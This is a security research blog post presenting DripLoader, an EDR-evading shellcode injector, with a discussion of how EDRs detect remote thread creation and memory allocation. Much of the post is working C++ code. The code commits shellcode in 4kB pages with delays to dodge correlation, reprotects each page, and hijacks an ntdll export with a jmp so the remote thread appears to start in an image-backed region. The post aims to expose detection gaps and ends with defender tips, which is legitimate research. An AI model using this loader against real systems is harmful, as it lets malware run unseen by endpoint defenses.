Bypassing EDR Real-Time Injection Detection Logic
By Filip Olszak
The blog is not about suppressing event collection, but discovering EDR architecture limitations, in the context of process injection.
Some great posts on bypassing EDR agent collection:
Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank)
A tale of EDR bypass methods (@s3cur3th1ssh1t)
FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec)
Hell's Gate (@smelly__vx, @am0nsec)
Halo's Gate - twin sister of Hell's Gate (sektor7)
Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog)
Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode)
In the previous post we discussed how solutions that use reliable, kernel-based sources for remote memory allocation events can use these to identify many of the in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from the user-mode. Most notably Microsoft uses that ETW, though there are vendors who do it better.
Today I wanted to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting, which combined give us a technique undetectable by MDATP and many other EDRs out there, as of today.
It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness around inherent limitations of these solutions and the need for in-house security R&D programs, or at least use of well-engineered managed detection services for more complete coverage.
Let's first take a look at what independent evaluations can tell us about process injections, and if there is even anything to bypass.

It's definitely good to know the product you're using is not able to flag Meterpreter's
migrate
command and process hollowing procedures from a 5+-year-old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested, and half a year to prepare if needed.Other than that value of the last evaluation in the context of injections is very limited, and we are not getting the full picture of how much each vendor invests into researching TTPs relevant right now, and in the future, or how robust the detection capability and data sources really are.

https://ela.st/mitre-round3
While some EDRs were not able to flag on the elementary techniques, many improved detection capabilities to the point that today, it is not uncommon for process injection to be considered OPSEC-expensive by red teams. Experienced operators tend to tailor detection bypasses per-solution, and in some environments, they choose to avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management are under close surveillance.
We are going to talk about bypassing the mature solutions today - for the ones with T1055 misses here just use APC injection and you'll probably be fine.
Let's first discuss all the detection opportunities for anomalous remote thread creation.
The API getting the most attention has to be
kernel32!CreateRemoteThread
, but we are really talking about ntdll!NtCreateThreadEx
, or the kernel-mode target intercepted through kernel callbacks.
https://github.com/elastic/detection-rules
Here we have a basic detection for a specific Windows process -
msbuild.exe
creating a new thread in a remote process. Even though the criticality of a potential true positive would be quite high, after testing the rule author decided it is only suitable for low severity (probably due to FP-rate), which likely degrades the rule to an IR label/enrichment in most environments.Such a simple detection rule is unlikely to be part of a mature EDR solution where customers expect to receive alerts for activities like this with high severity while keeping noise down to allow their analysts to review and classify the important stuff.

https://github.com/FalconForceTeam/FalconFriday
A more generic, custom MDATP thread creation rule-based around the new
FileProfile()
enrichment function - detects extremely rare files creating threads in remote processes. Very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form, as it would cause substantial amounts of false positives in certain environments, and could prove difficult to maintain. As an example, Defender logs most remote thread creations as labeled events, but low file prevalence is not good enough of an indicator to trigger an alert, and there is more advanced logic in play - true for most decent EDRs.

CRT events logged by Defender
By "detections" and "alerts" I do not just mean labeled activity that can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint.
(I also assume the platform is not incredibly noisy, to the level of it being unusable)
This is important to remember as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or generate them based on some risk score analysis often affectionately called "AI", making it difficult to judge whether some particular TTP would be detected in isolation. Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most.
On-agent detections, activity, and software inventories are often not implemented or limited in scope due to reverse engineering concerns or architecting difficulties.
We will exploit this fact later on when building our shellcode injector by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks where IDS solutions tend to detect based on thresholds.
For the same reason choosing your EDR vendor based on the numerical results of things like the Mitre evaluation and percentage of coverage - is not a good idea. Among other issues, the test rounds are executed in an unrealistically short time window of around 30 minutes for the whole attack kill chain, which means the time correlation of labeled events from the host to a single alert is good enough to score 100% coverage.
So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection, and forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events.
For thread creation, the most common constraint is a thread
starting process
≠ hosting process
- so monitoring only remote thread creation, usually also limited to those with:- thread start in image "unbacked"
MEM_COMMIT
-type segment - the size of segment being larger than
X
and on a scale this will still generate a very significant amount of false positives, which may lead to further filtering, for example:
- thread location (
target
) only in Windows built-in executables- only a subset of these
- thread initiator (
source
) only in risky executables- unknown hashes
- low file prevalence
- risky paths (
%userprofile%
,%temp%
etc.) - not seen on the network/on the host
- memory page contains suspicious stuff
Machine learning models are often employed to attempt solving this issue, and so on - these assumptions will differ for vendors, but the idea is to tame thread creation. The less mature solutions in fact often rely on thread creation hooking/callbacks as the only source of data for injection detection.
While it is true that for the majority of injection techniques a new thread will be created in the target process at some point, how it's created is often unexpected and makes monitoring infeasible, thus relying exclusively on
ntdll!NtCreateThread(Ex)
hooking/thread creation callbacks nowadays is an easily exploitable design flaw.SetThreadContext
In case of process hollowing or thread hijacking our target thread has already been created legitimately by the
Windows Loader
or target application locally, and thus there is nothing to detect upon. This is one of the reasons CobaltStrike execute-assembly
uses SetThreadContext
instead of CRT injection on the sacrificial process.Once we have the telemetry, on a scale it's much easier to detect certain
SetThreadContext
anomalies, than CRT-injection, and today in many environments it generates high criticality alerts, rendering fork&run useless in stealthy offensive ops.QueueUserAPC
Asynchronous Procedure Calls
provide another avenue for avoiding thread creation. An APC can be queued for an existing thread, and executed once it enters an alertable state.In recent years userland hooking evasion is getting a lot of coverage, and Early Bird injection has popularized the use of APCs for that purpose. The idea is to queue an APC in a newly spawned, suspended process before the
ntdll!LdrpInitializeProcess
function had a chance to run. That way our scheduled routine is executed before the hooking DLLs are loaded into the target process.DripLoader is an evasive shellcode loader (injector) for bypassing event-based injection detection, without necessarily suppressing event collection.The project is aiming to highlight limitations of event-driven injection identification, and show the need for more advanced memory scanning and smarter local agent inventories in EDR.
DripLoader evades EDRs by
using the most risky APIs possible likeNtAllocateVirtualMemory
andNtCreateThreadEx
blending in with call arguments to create events that vendors are forced to drop or log&ignore due to volume avoiding multi-event correlation by introducing delays
To bypass any memory allocation based logic we will only commit page granularity, or
PageSize
sized pages, which on Windows 10 with a modern processor is 4kB
:- this constant found in the
SYSTEM_INFO
structure tells us the lowest possible size of a VM allocation - since most legitimate remote VM operations work on a single, or a few bytes,
4kB
is by far the most prevalent allocation size (>95%), making it extremely challenging to detect on
- we need our shellcode in memory as a continuous byte sequence which means we cannot let
kernel32!VirtualAllocEx
choose the base, as it might reserve memory at an address where the other allocations will not fit - in Windows, any new VM allocation made with
kernel32!VirtualAllocEx
and similar is rounded up toAllocationGranularity
which is another constant found inSYSTEM_INFO
and is usually64kB
- for example, if we allocate
4kB
ofMEM_COMMIT | MEM_RESERVE
memory at0x40000000
, the whole0x40010000 (64kB)
region will be unavailable for new allocations
- pre-define a list of 64-bit base addresses and
VirtualQueryEx
the target process to find the first region able to fit our shellcode blob
const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
(void*)0x0000000010000000,
(void*)0x0000000021000000,
(void*)0x0000000032000000,
(void*)0x0000000043000000,
(void*)0x0000000050000000,
(void*)0x0000000041000000,
(void*)0x0000000042000000,
(void*)0x0000000040000000,
(void*)0x0000000022000000 };
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
MEMORY_BASIC_INFORMATION mbi;
for (auto base : VC_PREF_BASES) {
VirtualQueryEx(
hProc,
base,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE == mbi.State) {
uint64_t i;
for (i = 0; i < cVmResv; ++i) {
LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
VirtualQueryEx(
hProc,
currentBase,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE != mbi.State)
break;
}
if (i == cVmResv) {
// found suitable base
return base;
}
}
}
return nullptr;
}
- reserve required number of full
AllocationGranularity (64kB)
sized regions, and then loop over those committing4kB
pages to ensure page alignment
// MEM_RESERVE, NO_ACCESS, 64kB
for (i = 1; i <= cVmResv; ++i)
{
// sleeps here
ANtAVM(
hProc,
¤tVmBase,
NULL,
&szVmResv,
MEM_RESERVE,
PAGE_NOACCESS
);
if (STATUS_SUCCESS == status)
vcVmResv.push_back(currentVmBase);
else
return 4;
currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
}
// MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB
for (i = 0; i < cVmResv; ++i)
{
for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i)
{
DWORD offset = (cmm_i * szVmCmm);
currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);
ANtAVM(
hProc,
¤tVmBase,
NULL,
&szVmCmm,
MEM_COMMIT,
PAGE_READWRITE
);
// sleeps here
SIZE_T szWritten{ 0 };
ANtWVM(
hProc,
currentVmBase,
&shellcode[offsetSc],
szVmCmm,
&szWritten
);
offsetSc += szVmCmm;
// sleeps here
ANtPVM(
hProc,
¤tVmBase,
&szVmCmm,
PAGE_EXECUTE_READ,
&oldProt
);
}
}
The pages are also written to and individually reprotected with each run to avoid a large
RegionSize
of a target memory page in properties of logged VirtualProtectEx
events. (TiEtw provides this, and hooks can too).Now that we have our shellcode in the remote process we need to initiate its execution.
To do this we will use the
CreateThreadEx
native API which is the ntdll target of CRT, and hence very commonly called by legitimate software. To bypass any detections we will:- create the new thread from
MEM_IMAGE
base address- moreover, we use a known-good module loaded by the
Windows Loader
,ntdll.dll
- the location will be patched with a
far jmp
to our shellcode base at the time of thread creation
Note that we do not need to run in a
MEM_IMAGE
segment, as we only care about logging arguments in the TiEtw/Hook event. If our shellcode creates a new thread (which would happen for example when using sRDI
beacon.dll),
the locally created thread won't be tagged on by most EDRs, but it will no longer have ntdll
as it's start address which could get it detected by basic Endpoint Protection, and will get it detected by Get-InjectedThread
.- figure out
RVA
of the function we will hijack
// ntdll.dll
char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' };
// RtlpWow64CtxFromAmd64
char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' };
LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base)
{
unsigned char* b = (unsigned char*)&vm_base;
unsigned char jmpSc[7]{
0xB8, b[0], b[1], b[2], b[3],
0xFF, 0xE0
};
// find the export EP offset
HMODULE hJmpMod = LoadLibraryExA(
jmpModName,
NULL,
DONT_RESOLVE_DLL_REFERENCES
);
if (!hJmpMod)
return nullptr;
LPVOID lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);
DWORD offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod;
[...]
}
- find the base of remote
ntdll
and calculateAVA
[...]
LPVOID lpRemFuncEP{ 0 };
HMODULE hMods[1024];
DWORD cbNeeded;
char szModName[MAX_PATH];
if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded))
{
int i;
for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
{
if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char)))
{
if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) {
lpRemFuncEP = hMods[i];
break;
}
}
}
}
lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc);
[...]
- overwrite the function prologue with a
jmp
[...]
if (NULL == lpRemFuncEP)
return nullptr;
SIZE_T szWritten{ 0 };
WriteProcessMemory(
hProc,
lpDllExport,
jmpSc,
sizeof(jmpSc),
&szWritten
);
return lpDllExport;
}
CreateRemoteThread
The full source and more explanations can be found on GitHub
1. The activity will generate events with the following characteristics
// reservations
VM_ALLOC:
REMOTE: 1,
SIZE: 0x10000,
TYPE: 0x2000,
PROT: 0x01 (-)
// commits
VM_ALLOC:
REMOTE: 1,
SIZE: 0x1000,
TYPE: 0x1000,
PROT: 0x04 (rw)
VM_WRITE:
REMOTE: 1,
SIZE: 0x1000
THREAD_START:
REMOTE: 1,
SUSPENDED: 0,
ACCMSK: 0xFFFF (full),
PAGE_TYPE: 0x1000000 (img),
LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0
2. State of the target process (assuming shellcode does not create thread)


- Option #1: Monitor injection APIs yourself
- EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected
- aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team